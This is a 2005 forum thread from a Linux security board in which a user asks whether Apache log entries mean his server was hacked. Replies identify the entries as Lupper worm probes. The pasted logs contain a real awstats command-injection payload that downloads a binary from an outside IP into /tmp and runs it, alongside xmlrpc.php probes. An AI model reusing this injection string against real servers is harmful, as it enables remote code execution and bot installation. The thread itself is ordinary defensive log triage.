LinuxQuestions.org
Review your favorite Linux distribution.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 11-27-2005, 08:06 PM   #1
lawadm1
Member
 
Registered: Jul 2003
Location: Illinois
Distribution: Fedora 11, Ubuntu 9.04
Posts: 80

Rep: Reputation: 15
Question Apache entries - Hacked??


I found the following entries in my access_log that I have never received before. It looks like they were all 404, but I would feel much better if someone verified it. TIA Jeff

211.214.161.159 - - [27/Nov/2005:14:13:22 -0600] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"

211.214.161.159 - - [27/Nov/2005:14:13:23 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"

211.214.161.159 - - [27/Nov/2005:14:13:25 -0600] "POST /xmlrpc.php HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"

211.214.161.159 - - [27/Nov/2005:14:13:27 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"

211.214.161.159 - - [27/Nov/2005:14:13:28 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"

211.214.161.159 - - [27/Nov/2005:14:13:32 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"

211.214.161.159 - - [27/Nov/2005:14:13:33 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
 
Old 11-27-2005, 08:22 PM   #2
lord-fu
Member
 
Registered: Apr 2005
Location: Ohio
Distribution: Slackware && freeBSD
Posts: 676

Rep: Reputation: 30
Hi,

Not a security expert but I have seen those in my logs as well and they are looking for those files on windoze machines. I believe IMHO that you can safely ignore those...however I am no expert and I am sure someone else will give their input as well.
 
Old 11-27-2005, 08:49 PM   #3
btmiller
Senior Member
 
Registered: May 2004
Location: In the DC 'burbs
Distribution: Arch, Scientific Linux, Debian, Ubuntu
Posts: 4,133

Rep: Reputation: 320Reputation: 320Reputation: 320Reputation: 320
I think they are looking for *nix boxen, since these look a lot like hits from the Lupper worm, which attacks several vulnerable Web applications. I've seen this on a number of servers, and so long as you don't have the vulnerable applications installed, you are OK.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
How did my linux-apache webserver get hacked? markie Linux - Security 18 10-19-2004 08:07 PM
Apache - seems like I was hacked :-( dima1978 Linux - Security 4 09-20-2004 04:31 PM
Suspicious looking Apache log entries linuxpyro Linux - Security 4 04-25-2004 02:54 PM
apache error log entries synaptical Linux - Security 3 01-26-2004 01:28 AM
Apache 2 on Linux Red Hat 7.3: have I been hacked? Zingaro2002 Linux - Security 4 06-03-2003 11:37 AM


All times are GMT -5. The time now is 04:32 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration